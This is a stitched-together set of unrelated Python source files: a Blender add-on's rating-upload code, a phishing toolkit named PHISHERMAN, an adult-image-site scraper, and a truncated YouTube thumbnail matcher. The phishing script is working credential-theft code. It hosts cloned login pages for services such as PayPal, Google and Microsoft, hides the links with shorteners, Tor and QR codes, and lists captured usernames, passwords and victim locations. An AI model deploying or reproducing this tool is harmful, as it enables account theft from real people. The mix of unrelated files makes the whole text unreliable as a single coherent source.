headers = utils.get_headers(api_key)
asset = self.id_data
if asset:
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
else:
# this part is for operator rating:
bkit_ratings = self
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
if bkit_ratings.rating_quality > 0.1:
ratings = [('quality', bkit_ratings.rating_quality)]
tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)), wait=2.5, only_last=True)
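# Note: wait=2.5 with only_last=True presumably debounces the rating sliders --
# queued duplicates are collapsed so only the final value reaches the server.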
def update_ratings_work_hours(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
asset = self.id_data
if asset:
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
else:
# this part is for operator rating:
bkit_ratings = self
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
if bkit_ratings.rating_work_hours > 0.05:
ratings = [('working_hours', round(bkit_ratings.rating_work_hours, 1))]
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)), wait=2.5, only_last=True)
def upload_rating(asset):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
bkit_ratings = asset.bkit_ratings
# print('rating asset', asset_data['name'], asset_data['assetBaseId'])
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
ratings = [
]
if bkit_ratings.rating_quality > 0.1:
ratings = (('quality', bkit_ratings.rating_quality),)
tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)), wait=2.5, only_last=True)
if bkit_ratings.rating_work_hours > 0.1:
ratings=(('working_hours', round(bkit_ratings.rating_work_hours, 1)),)
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)), wait=2.5, only_last=True)
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/review'
reviews = {
'reviewText': bkit_ratings.rating_compliments,
'reviewTextProblems': bkit_ratings.rating_problems,
}
    if not (bkit_ratings.rating_compliments == '' and bkit_ratings.rating_problems == ''):
thread = threading.Thread(target=upload_review_thread, args=(url, reviews, headers))
thread.start()
# the info that the user rated an item is stored in the scene
s = bpy.context.scene
s['assets rated'] = s.get('assets rated', {})
if bkit_ratings.rating_quality > 0.1 and bkit_ratings.rating_work_hours > 0.1:
s['assets rated'][asset['asset_data']['assetBaseId']] = True
def get_assets_for_rating():
'''
gets assets from scene that could/should be rated by the user.
TODO this is only a draft.
'''
assets = []
for ob in bpy.context.scene.objects:
if ob.get('asset_data'):
assets.append(ob)
for m in bpy.data.materials:
if m.get('asset_data'):
assets.append(m)
for b in bpy.data.brushes:
if b.get('asset_data'):
assets.append(b)
return assets
asset_types = (
('MODEL', 'Model', 'set of objects'),
('SCENE', 'Scene', 'scene'),
('MATERIAL', 'Material', 'any .blend Material'),
('TEXTURE', 'Texture', 'a texture, or texture set'),
('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
    ('ADDON', 'Addon', 'add-on'),
)
# TODO drop this operator, not needed anymore.
class UploadRatingOperator(bpy.types.Operator):
"""Upload rating to the web db"""
bl_idname = "object.blenderkit_rating_upload"
bl_label = "Send Rating"
bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}
# type of upload - model, material, textures, e.t.c.
# asset_type: EnumProperty(
# name="Type",
# items=asset_types,
# description="Type of asset",
# default="MODEL",
# )
# @classmethod
# def poll(cls, context):
# return bpy.context.active_object != None and bpy.context.active_object.get('asset_id') is not None
def draw(self, context):
layout = self.layout
layout.label(text='Rating sent to server. Thanks for rating!')
def execute(self, context):
return {'FINISHED'}
def invoke(self, context, event):
wm = context.window_manager
asset = utils.get_active_asset()
upload_rating(asset)
return wm.invoke_props_dialog(self)
def stars_enum_callback(self, context):
'''regenerates the enum property used to display rating stars, so that there are filled/empty stars correctly.'''
items = []
for a in range(0, 10):
if self.rating_quality < a + 1:
icon = 'SOLO_OFF'
else:
icon = 'SOLO_ON'
# has to have something before the number in the value, otherwise fails on registration.
items.append((f'{a + 1}', f'{a + 1}', '', icon, a + 1))
return items
def update_quality_ui(self, context):
    '''Converts the _ui enum value into the actual quality number.'''
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_quality_ui = '0'
self.rating_quality = int(self.rating_quality_ui)
def update_ratings_work_hours_ui(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_work_hours_ui = '0'
self.rating_work_hours = float(self.rating_work_hours_ui)
def update_ratings_work_hours_ui_1_5(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_work_hours_ui_1_5 = '0'
# print('updating 1-5')
# print(float(self.rating_work_hours_ui_1_5))
self.rating_work_hours = float(self.rating_work_hours_ui_1_5)
class FastRateMenu(Operator):
"""Fast rating of the assets directly in the asset bar - without need to download assets."""
bl_idname = "wm.blenderkit_menu_rating_upload"
bl_label = "Send Rating"
bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}
message: StringProperty(
name="message",
description="message",
default="Rating asset")
asset_id: StringProperty(
name="Asset Base Id",
description="Unique name of the asset (hidden)",
default="")
asset_type: StringProperty(
name="Asset type",
description="asset type",
default="")
rating_quality: IntProperty(name="Quality",
description="quality of the material",
default=0,
min=-1, max=10,
update=update_ratings_quality)
# the following enum is only to ease interaction - enums support 'drag over' and enable to draw the stars easily.
rating_quality_ui: EnumProperty(name='rating_quality_ui',
items=stars_enum_callback,
description='Rating stars 0 - 10',
default=0,
update=update_quality_ui,
)
rating_work_hours: FloatProperty(name="Work Hours",
description="How many hours did this work take?",
default=0.00,
min=0.0, max=1000, update=update_ratings_work_hours
)
rating_work_hours_ui: EnumProperty(name="Work Hours",
description="How many hours did this work take?",
items=[('0', '0', ''),
('.5', '0.5', ''),
('1', '1', ''),
('2', '2', ''),
('3', '3', ''),
('4', '4', ''),
('5', '5', ''),
('6', '6', ''),
('8', '8', ''),
('10', '10', ''),
('15', '15', ''),
('20', '20', ''),
('50', '50', ''),
('100', '100', ''),
('150', '150', ''),
('200', '200', ''),
('250', '250', ''),
],
default='0', update=update_ratings_work_hours_ui
)
rating_work_hours_ui_1_5: EnumProperty(name="Work Hours",
description="How many hours did this work take?",
items=[('0', '0', ''),
('.2', '0.2', ''),
('.5', '0.5', ''),
('1', '1', ''),
('2', '2', ''),
('3', '3', ''),
('4', '4', ''),
('5', '5', '')
],
default='0', update=update_ratings_work_hours_ui_1_5
)
@classmethod
def poll(cls, context):
scene = bpy.context.scene
ui_props = scene.blenderkitUI
return ui_props.active_index > -1
def draw(self, context):
layout = self.layout
col = layout.column()
# layout.template_icon_view(bkit_ratings, property, show_labels=False, scale=6.0, scale_popup=5.0)
col.label(text=self.message)
row = col.row()
row.prop(self, 'rating_quality_ui', expand=True, icon_only=True, emboss=False)
col.separator()
col.prop(self, 'rating_work_hours')
row = col.row()
if self.asset_type == 'model':
row.prop(self, 'rating_work_hours_ui', expand=True, icon_only=False, emboss=True)
else:
row.prop(self, 'rating_work_hours_ui_1_5', expand=True, icon_only=False, emboss=True)
def execute(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
rtgs = [
]
if self.rating_quality_ui == '':
self.rating_quality = 0
else:
self.rating_quality = int(self.rating_quality_ui)
if self.rating_quality > 0.1:
rtgs = (('quality', self.rating_quality),)
tasks_queue.add_task((send_rating_to_thread_quality, (url, rtgs, headers)), wait=2.5, only_last=True)
if self.rating_work_hours > 0.1:
rtgs = (('working_hours', round(self.rating_work_hours, 1)),)
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, rtgs, headers)), wait=2.5, only_last=True)
return {'FINISHED'}
def invoke(self, context, event):
scene = bpy.context.scene
ui_props = scene.blenderkitUI
if ui_props.active_index > -1:
sr = bpy.context.scene['search results']
asset_data = dict(sr[ui_props.active_index])
self.asset_id = asset_data['id']
self.asset_type = asset_data['assetType']
self.message = f"Rate asset {asset_data['name']}"
wm = context.window_manager
return wm.invoke_props_dialog(self)
def rating_menu_draw(self, context):
layout = self.layout
ui_props = context.scene.blenderkitUI
sr = bpy.context.scene['search results orig']
asset_search_index = ui_props.active_index
if asset_search_index > -1:
asset_data = dict(sr['results'][asset_search_index])
col = layout.column()
layout.label(text='Admin rating Tools:')
col.operator_context = 'INVOKE_DEFAULT'
op = col.operator('wm.blenderkit_menu_rating_upload', text='Fast rate')
op.asset_id = asset_data['id']
op.asset_type = asset_data['assetType']
def register_ratings():
bpy.utils.register_class(UploadRatingOperator)
bpy.utils.register_class(FastRateMenu)
# bpy.types.OBJECT_MT_blenderkit_asset_menu.append(rating_menu_draw)
def unregister_ratings():
    # bpy.utils.unregister_class(StarRatingOperator)
    bpy.utils.unregister_class(UploadRatingOperator)
    bpy.utils.unregister_class(FastRateMenu)
|
main.py
|
#!/Library/Frameworks/Python.framework/Versions/3.8/bin/python3
import subprocess
from sys import exit
from src.termcolor import colored
import platform
from base64 import b64decode
from zipfile import ZipFile
from os import walk,path,getcwd,mkdir,remove,environ
import threading
from datetime import datetime
from src import requests
from src.torpy.http.requests import TorRequests
from src.flask import Flask, render_template, request
import logging
log = logging.getLogger('werkzeug')
log.disabled = True
environ['WERKZEUG_RUN_MAIN'] = 'true'
try:
subprocess.check_output('php -v > /dev/null 2>&1',shell=True)
except subprocess.CalledProcessError:
print(colored('[*] PLEASE INSTALL PHP BEFORE STARTING PHISHERMAN','red',attrs=['bold']))
exit()
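# get_my_ip below slices the raw ipify JSON body ({"ip":"x.x.x.x"}) by hand:
# split(':')[-1] keeps the part after the colon and [1:-2] strips the opening
# quote and the trailing "}. Parsing with .json()['ip'] would be sturdier.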
def get_my_ip():
return requests.get('https://api.ipify.org/?format=json').content.decode('utf8').split(':')[-1][1:-2]
def shorten(url,vpn):
inter = vpn.post('http://lnkiy.com/createShortLink',data={"link":""+url}).content.decode('utf8')
if '++' in inter:
return inter.split('++')[0]
else:
print(inter)
return '[*] Error generating random shortened URL'
def custom_short(url,c,vpn):
inter = vpn.post('http://lnkiy.com/createCustomUrl',data={"linld":""+url,"slink":""+c}).content.decode('utf8')
if '++' in inter:
return inter.split('++')[0]
else:
return '[*] Error generating custom shortened URL'
def qrcode(url,server,vpn):
if not path.isdir('qrcodes'):
mkdir('qrcodes')
if 'lnkiy' in url:
c = vpn.get(url+'-qrcode',allow_redirects = True).content.decode('utf8').split('<img height="300px" width="300px" src="')[-1].split('"/>')[0]
open('qrcodes/'+server+'-qr.png','wb').write(b64decode(c.split(',')[-1]))
return 'qrcodes/'+server+'-qr.png'
else:
open('qrcodes/'+server+'-qr.png','wb').write(requests.get('https://chart.apis.google.com/chart?cht=qr&chs=300x300&chl='+url+'&chld=H|0').content)
return 'qrcodes/'+server+'-qr.png'
def ngrok():
try:
subprocess.check_output('./ngrok -v > /dev/null 2>&1',shell=True)
return
    except subprocess.CalledProcessError:
        pass
    # ngrok binary not found; download the build matching this platform
    print(colored('[*] Downloading ngrok', 'red', attrs=['bold']))
    if platform.system() == 'Darwin':
        r = requests.get('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-amd64.zip', allow_redirects=True).content
    else:
        r = requests.get('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip', allow_redirects=True).content
    open('ngrok-zip.zip', 'wb').write(r)
    with ZipFile('ngrok-zip.zip', 'r') as zip:
        zip.extractall()
    subprocess.Popen(['chmod', '+x', 'ngrok'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
    tkn = input(colored('[*] Please create an account on https://ngrok.com and enter your authtoken : ', 'green', attrs=['bold']))
    subprocess.Popen(['./ngrok', 'authtoken', tkn], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
    subprocess.Popen(['rm', '-rf', 'ngrok-zip.zip'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
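# get_link scrapes the public https URL out of ngrok's local status API
# (http://127.0.0.1:4040/api/tunnels) by raw string splitting, so it is brittle
# against layout changes in that JSON. start_ngrok tunnels local port 3030,
# where start_php() serves the chosen page.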
get_link = lambda : "https:"+requests.get('http://127.0.0.1:4040/api/tunnels/command_line').content.decode('utf8').split(',')[2].split(':')[2].strip('"')
start_ngrok = lambda : subprocess.Popen(['./ngrok','http', '3030'],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
def start_php(server):
subprocess.Popen(['php','-S', '127.0.0.1:3030','-t','sites/'+server],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
def refresh():
for root, dirs, files in walk(getcwd()+'/sites/'):
for file in files:
if file in ('ip.txt','redir.txt','victims.txt'):
open(path.join(root, file),'w+')
for root, dirs, files in walk(getcwd()+'/qrcodes/'):
for file in files:
if file.split('.')[-1].lower() == 'png':
remove('qrcodes/'+file)
def attack(server,url,wifi,custom,qr):
t1 = threading.Thread(target=start_ngrok)
t2 = threading.Thread(target=start_php,args=[server])
    t1.daemon = True
    t2.daemon = True
print()
print(colored('[*] Starting php server....','green',attrs=['bold']))
t2.start()
print(colored('[*] Starting ngrok....','green',attrs=['bold']))
t1.start()
if '/' not in server:
open(getcwd()+'/sites/'+server+'/redir.txt','w+').write(url)
elif wifi:
open(getcwd()+'/sites/'+server+'/wifi.txt','w+').write(wifi)
print(colored('[*] Initiating Tor....','green',attrs=['bold']))
my_ip = [get_my_ip().strip(' ').strip('\n')]
with TorRequests() as tor_requests:
with tor_requests.get_session() as sess:
print(colored('[*] Generating links....','green',attrs=['bold']))
while 1:
try:
link = get_link()
qrc = ''
shortened = ''
if custom:
shortened = custom_short(link,custom,sess)
if '://' not in shortened:
shortened += '\n'+shorten(link,sess)
else:
shortened = shorten(link,sess)
if qr:
if '://' in shortened:
ur = shortened if '\n' not in shortened else shortened.split('\n')[-1]
qrc = '[*] QR Code for '+ur+' saved at '+qrcode(ur,server,sess)
else:
qrc = '[*] QR Code for '+link+' saved at '+qrcode(link,server,sess)
break
except Exception as e:
print(e)
return
print()
print(colored('[*] Send any of these links to victim : \n\n','green',attrs=['bold'])+colored(link+'\n'+shortened+'\n'+qrc,'red',attrs=['bold']))
return
def visitors(server):
final = ''
v1 = '''<div class="row"><input type="radio" name="expand"><span class="cell primary" data-label="IP Address">'''
v2 = '''</span><span class="cell" data-label="'''
v3 = '">'
v4 = "</span>"
v5 = "</span></div>"
r = open('sites/'+server+'/ip.txt').read().split('\n')
f = ip_details(r)
if not f:
return ''
for a in f:
k = list(a.keys())
v = list(a.values())
final += v1+v[0]+v2
        # v[0] (the IP) already fills the primary cell; emit the remaining fields
        for b in range(len(v) - 1):
            final += k[b + 1] + v3 + v[b + 1] + v4 + v2
final += v5
return final
def victims(server):
final = ''
v1 = '''<div class="row"><input type="radio" name="expand"><span class="cell primary" data-label="Username">'''
v2 = '''</span><span class="cell" data-label="Password">'''
v3 = '</span></div>'
for a in open('sites/'+server+'/victims.txt').read().split('\n'):
if a:
b = a.split('<!:!>')
final += v1+b[0]+v2+b[1]+v3
if not final:
return ''
return final
def ip_details(lisz):
final = []
lisz = lisz[:-1]
for lis in range(len(lisz)):
        if not lisz[lis] or lisz[lis][0] not in '0123456789':
            continue
finale = {}
ip = lisz[lis]
headers = {
"User-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"
}
url = 'http://ip-api.com/json/'+ip.strip('\n')
dic = requests.get(url,headers=headers).json()
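        # entries whose org field is an AWS range are skipped below -- these are
        # presumably ngrok's own probes rather than real visitors.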
if 'AWS' in dic['org']:
return 0
finale['IP Address']=lisz[lis]
finale['Language']=lisz[lis+1]
finale['User Agent']=lisz[lis+2]
finale['Country']=dic['country']
finale['Country Code']=dic['countryCode']
finale['Region']=dic['regionName']
finale['City']=dic['city']
finale['Zip Code']=dic['zip']
finale['ISP Latitude']=str(dic['lat'])
finale['ISP Longitude']=str(dic['lon'])
finale['Timezone']=dic['timezone']
finale['ISP']=dic['isp']
finale['ISP Organisation']=dic['org']
finale['AS']=dic['as']
final.append(finale)
return final
def main():
ngrok()
s1 = colored('''
[*] DISCLAIMER : DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE [*]
FOR EDUCATIONAL PURPOSES ONLY
''','red',attrs=['bold'])
s2 = colored('''
.
' \ O_____ _ _ _____ _____ _ _ ______ _____ __ __ _ _
' \@ | __ \| | | |_ _|/ ____| | | | ____| __ \| \/ | /\ | \ | |
' `\/| |__) | |__| | | | | (___ | |__| | |__ | |__) | \ / | / \ | \| |
' __| ___/| __ | | | \___ \| __ | __| | _ /| |\/| | / /\ \ | . ` |
' //| | | | | | |_| |_ ____) | | | | |____| | \ \| | | |/ ____ \| |\ |
' // | |_| |_| |_|_____|_____/|_| |_|______|_| \_\_| |_/_/ \_\_| \_| v1.0
'~-~-~-~-~-~"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
''','green',attrs=['bold'])
s3 = colored('''
[1] ADOBE [11] INSTAGRAM [21] TWITCH [31] FLICKR
[2] AMAZON [12] LINKEDIN [22] TWITTER [32] COINIMP
[3] APPLE ID [13] MESSENGER [23] WORDPRESS [33] INSTAGRAM VERIFICATION
[4] WIFI [14] MICROSOFT [24] YAHOO [q/Q] QUIT
[5] DROPBOX [15] NETFLIX [25] EBAY
[6] FACEBOOK [16] PAYPAL [26] ORIGIN
[7] GITHUB [17] PINTEREST [27] CRYPTOCOIN
[8] GOOGLE [18] PROTONMAIL [28] STACKOVERFLOW
[9] iCLOUD [19] SNAPCHAT [29] NGROK
[10] IGFOLLOWERS [20] STEAM [30] REDDIT
''','green',attrs=['bold'])
print(s1+s2+s3,end='\n\n')
server_list={
1 : 'adobe',
2 : 'amazon',
3 : 'apple',
4 : 'wifi',
5 : 'dropbox',
6 : 'facebook',
7 : 'github',
8 : 'google',
9 : 'icloud',
10 : 'igfollowers',
11 : 'instagram',
12 : 'linkedin',
13 : 'messenger',
14 : 'microsoft',
15 : 'netflix',
16 : 'paypal',
17 : 'pinterest',
18 : 'protonmail',
19 : 'snapchat',
20 : 'steam',
21 : 'twitch',
22 : 'twitter',
23 : 'wordpress',
24 : 'yahoo',
25 : 'ebay',
26 : 'origin',
27 : 'cryptocoin',
28 : 'stackoverflow',
29 : 'ngrok',
30 : 'reddit',
31 : 'flickr',
32 : 'coinimp',
33 : 'instagram-verified'
}
links = {
'apple' : 'https://www.apple.com/shop/bag',
'igfollowers' : 'https://www.instafollowerspro.com/login/login-procc.php',
'microsoft' : 'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&ct=1616477099&rver=7.0.6738.0&wp=MBI_SSL&wreply=https:%2F%2Faccount.microsoft.com%2Fauth%2Fcomplete-signin%3Fru%3Dhttps%253A%252F%252Faccount.microsoft.com%252F%253Frefp%253Dsignedout-index%2526refd%253Dwww.google.com&id=292666&lw=1&fl=easi2&uiflavor=web&mkt=EN-GB&lc=2057&contextid=34E1E35DF72CFEA1&bk=1616477114&uaid=d0aa0f5716da4260bfd055b0666a726e&pid=0',
'protonmail' : 'https://mail.protonmail.com/inbox',
'yahoo' : 'https://login.yahoo.com/account/challenge/password?done=https%3A%2F%2Fwww.yahoo.com%2F&sessionIndex=QQ--&acrumb=8JMZJQox&display=login&authMechanism=primary',
'instagram' : 'https://www.instagram.com',
'adobe' : 'https://www.adobe.com/',
'amazon' : 'https://www.amazon.com',
'dropbox' : 'https://www.dropbox.com/',
'facebook' : 'https://www.facebook.com',
'github' : 'https://www.github.com/',
'google' : 'https://www.google.com/webhp?hl=en&sa=X&ved=0ahUKEwiur43wqM7vAhX0wTgGHdiYBf8QPAgI',
'icloud' : 'https://www.icloud.com/',
'linkedin' : 'https://www.linkedin.com/',
'messenger' : 'https://www.messenger.com/',
'netflix' : 'https://www.netflix.com/',
'paypal' : 'https://www.paypal.com/',
'pinterest' : 'https://www.pinterest.com/',
'snapchat' : 'https://www.snapchat.com/',
'steam' : 'https://store.steampowered.com/',
'twitch' : 'https://www.twitch.tv/',
'twitter' : 'https://twitter.com/?lang=en',
'wordpress' : 'https://wordpress.com/me',
'ebay' : 'https://www.ebay.com/',
'origin' : 'https://www.origin.com/en-us/store',
'cryptocoin' : 'https://www.cryptocoin.pro/',
'stackoverflow' : 'https://stackoverflow.com/',
'ngrok' : 'https://ngrok.com/',
'reddit' : 'https://www.reddit.com/',
'flickr' : 'https://www.flickr.com',
'coinimp' : 'https://www.coinimp.com/dashboard',
}
while 1:
print(colored('[*] Select your choice : ','green',attrs=['bold']),end='')
ch = input()
if ch.upper() == 'Q':
return
        elif ch.isdigit() and int(ch) in server_list:
server = server_list[int(ch)]
break
else:
print(colored('[*] Invalid choice','yellow',attrs=['bold']))
    if server.upper() not in ('WIFI', 'INSTAGRAM-VERIFIED'):
r = colored('[*] Enter the URL you want to redirect the victim to (default is homepage of '+server.upper()+') : ','green',attrs=['bold'])
print()
redir_url = input(r)
if not redir_url:
redir_url = links[server]
wifi_model = ''
elif server.upper() == 'WIFI':
sub_servers = {
1 : 'firmware-upgrade',
2 : 'starbucks-login',
3 : 'modal-login'
}
print(colored('''
[1] FIRMWARE UPGRADE
[2] STARBUCKS LOGIN TO GOOGLE
[3] LOGIN TO WIFI THROUGH MODAL
''','green',attrs=['bold']))
wifi_model = redir_url = ''
while 1:
ch_sub = input(colored('[*] Select your choice ','green',attrs=['bold']))
            if ch_sub in ('1', '2', '3'):
server += '/'+sub_servers[int(ch_sub)]
break
else:
print(colored('[*] Invalid choice','yellow',attrs=['bold']))
if ch_sub == '1':
print()
wifi_model = input(colored('[*] Enter the brand of the target router ','green',attrs=['bold'])).upper()
elif ch_sub == '3':
print()
wifi_model1 = input(colored('[*] Enter the AP name of the target router ','green',attrs=['bold']))
wifi_model2 = input(colored('[*] Enter the encryption type of the target router ','green',attrs=['bold']))
wifi_model = wifi_model1.upper()+':'+wifi_model2.upper()
else:
wifi_model = redir_url = ''
print()
custom = input(colored('[*] Enter a custom shortened URL name (leave empty to generate a random shortened URL) ','green',attrs=['bold']))
print()
qr = input(colored('[*] Do you want to generate a QR Code for the link (Y/N)? '))
qr = 1 if qr.upper() == 'Y' else 0
attack(server,redir_url,wifi_model,custom,qr)
final = '''[*] Navigate to http://127.0.0.1:5000 from your browser to view accounts phished\n\n[*] Press ctrl+C to quit'''
print(colored(final,'yellow',attrs=['bold']))
return server
app = Flask(__name__)
class web_server:
global server
refresh()
server = main()
if not server:
exit()
@app.route('/',methods = ['GET'])
def index():
return render_template('index.html')
@app.route('/visitors')
def index2():
return render_template('visitors.html')+visitors(server)
@app.route('/victims')
def index3():
return render_template('victims.html')+victims(server)
if __name__ == '__main__' and platform.system().upper() != 'WINDOWS':
app.run()
|
query.py
|
import requests as req
import bs4
from urllib.parse import quote
import time
import threading
from post import Post
from threads_request import threaded_request
class Query(object):
def __init__(self):
pass
@staticmethod
def query_by_tags(tags: set, pages: int = 1, anti_tags: set = set()):
"""Make a rule 34 Posts query by tags
Args:
tags (set{str}): Requested tags
pages (int, optional): Number of pages to browse
anti_tags (set, optional): Tags to exclude from the request
Returns:
Union(Post[], None): Found posts
"""
pages_url = list()
posts_id = set()
tags = {quote(tag.replace(' ', '_').lower()) for tag in tags}
anti_tags = {'-'+quote(tag.replace(' ', '_').lower()) for tag in anti_tags}
formatted_args = '+'.join(tags | anti_tags)
base_url = f"https://rule34.xxx/index.php?page=post&s=list&tags={formatted_args}"
print(time.time(), 'Getting all IDs...')
start = time.time()
for page_id in map(lambda x: x*42, range(pages)):
page_url = base_url+f'&pid={page_id}'
pages_url.append(page_url)
def page_handler(page_url):
page_soup = bs4.BeautifulSoup(req.get(page_url).content, features='html.parser')
for thumbnail in page_soup.findAll('span', {'class':'thumb'}):
post_id = thumbnail.a['id'][1:]
if Post.is_id_valid(post_id):
posts_id.add(post_id)
THREADS = []
for url in pages_url:
t = threading.Thread(target=page_handler, args=(url,))
THREADS.append(t)
for thread in THREADS:
thread.start()
for thread in THREADS:
thread.join()
print(time.time(), 'Done getting all IDs')
print('Getting all ids took', time.time()-start, 's')
return threaded_request(posts_id)
@classmethod
def query_by_artist(cls, name: str, **kwargs):
"""Make a rule 34 Posts query by artist name
Args:
name (str): Requested artist
pages (int, optional): Number of pages to browse
anti_tags (set, optional): Tags to exclude from the request
Returns:
Union(Post[], None): Found posts
"""
return cls.query_by_tags({name,}, **kwargs)
@classmethod
def query_by_characters(cls, names: tuple, **kwargs):
"""Make a rule 34 Posts query by artist name
WARNING : Characters names might follow different schemes :
* name
* name_firstname
* firstname_name
* name_(work)
Args:
names (tuple): Requested characters
pages (int, optional): Number of pages to browse
anti_tags (set, optional): Tags to exclude from the request
Returns:
Union(Post[], None): Found posts
"""
return cls.query_by_tags(set(names), **kwargs)
@classmethod
def query_by_work(cls, name: str, **kwargs):
"""Make a rule 34 Posts query by artist name
WARNING : Characters names might follow different schemes :
* name
* name_firstname
* firstname_name
* name_(work)
Args:
name (str): Requested work
pages (int, optional): Number of pages to browse
anti_tags (set, optional): Tags to exclude from the request
Returns:
Union(Post[], None): Found posts
"""
names = tuple((name,))
return cls.query_by_tags(set(names), **kwargs)
@staticmethod
def no_homo():
"""You'll thanks me later."""
return {'yaoi', '1boy', 'male_only', 'gay', 'gay_sex', '2boys', 'femboy', 'genderswap', 'solo_male', 'futanari', 'futa_only', '1futa', 'male_on_futa', 'furry', 'eroborus', 'gachichan'}
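# Usage sketch for this class (the tag values here are illustrative
# assumptions, not from this module):
#
#   posts = Query.query_by_tags({"landscape"}, pages=2, anti_tags={"photo"})
#   posts = Query.query_by_artist("some_artist", pages=1)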
|
main.py
|
import os
import os.path as path
import requests
import youtube_dl
import imagehash
from PIL import Image
import ffmpeg
from youtube_dl.utils import DownloadError
import responder
import json
import asyncio
import base64
import threading
import time
dirpath = "/tmp/yfts"
if not path.exists(dirpath):
os.mkdir(dirpath)
if not path.exists(dirpath + "/images/"):
os.mkdir(dirpath + "/images/")
if not path.exists(dirpath + "/thumbnails/"):
os.mkdir(dirpath + "/thumbnails/")
if not path.exists(dirpath + "/videos/"):
os.mkdir(dirpath + "/videos/")
def downloadThumbnail(vid):
url = "https://img.youtube.com/vi/{vid}/maxresdefault.jpg".format(vid=vid)
response = requests.get(url)
print("Status code: {}".format(response.status_code))
if "image" not in response.headers["content-type"]:
print("Content type not supported: {}".format(
response.headers["content-type"]))
return False
with open(dirpath + "/thumbnails/" + vid + ".jpg", "wb") as f:
f.write(response.content)
return True
def downloadVideo(vid):
ydl = youtube_dl.YoutubeDL(
{"outtmpl": dirpath + "/videos/%(id)s.%(ext)s", "format": "webm"})
try:
with ydl:
ydl.extract_info(
"https://youtu.be/{}".format(vid),
download=True
)
except Exception as e:
return e
def convertVideoToImage(vid):
if not path.exists(dirpath + "/images/{}/".format(vid)):
os.mkdir(dirpath + "/images/{}/".format(vid))
try:
stream = ffmpeg.input(
dirpath + "/videos/" + vid + ".webm"
)
stream = ffmpeg.output(
stream,
dirpath +
'/images/{}/%05d.jpg'.format(vid),
r=1
)
ffmpeg.run(stream)
return True
except Exception as e:
return e
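# Note: with r=1, ffmpeg emits one frame per second of video, so the %05d
# frame number doubles as a timestamp in seconds; getImageBase64 and
# findThumbnail below rely on this to map frames back to video positions.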
def getImageBase64(vid, sec):
print("getImageBase64({}, {})".format(vid, sec))
with open(dirpath + "/images/{}/{}.jpg".format(vid, str(sec).zfill(5)), "rb") as f:
data = f.read()
return base64.b64encode(data).decode("utf-8")
def findThumbnail(vid):
thumbnails_hash = imagehash.phash(
Image.open(dirpath + "/thumbnails/" + vid + ".jpg")
)
files = [f for f in os.listdir(
dirpath + "/images/{}/".format(vid)) if path.isfile(path.join(dirpath + "/images/{}/".format(vid), f))]
files_similar = {}
for file in files:
file_hash = imagehash.phash(Image.open(
path.join(dirpath + "/images/{}/".format(vid), file)))
files_similar[int(file[:-4])] = file_hash-thumbnails_hash
return sorted(files_similar.items(), key=lambda x: x[1])
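# Note: imagehash.phash produces a perceptual hash, and subtracting two
# hashes yields their Hamming distance, so smaller values mean more similar
# images. A quick sketch of the idea (the file names are hypothetical):
#
#   h1 = imagehash.phash(Image.open("a.jpg"))
#   h2 = imagehash.phash(Image.open("b.jpg"))
#   distance = h1 - h2  # 0 means visually identical under pHash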
def getInformation(url):
try:
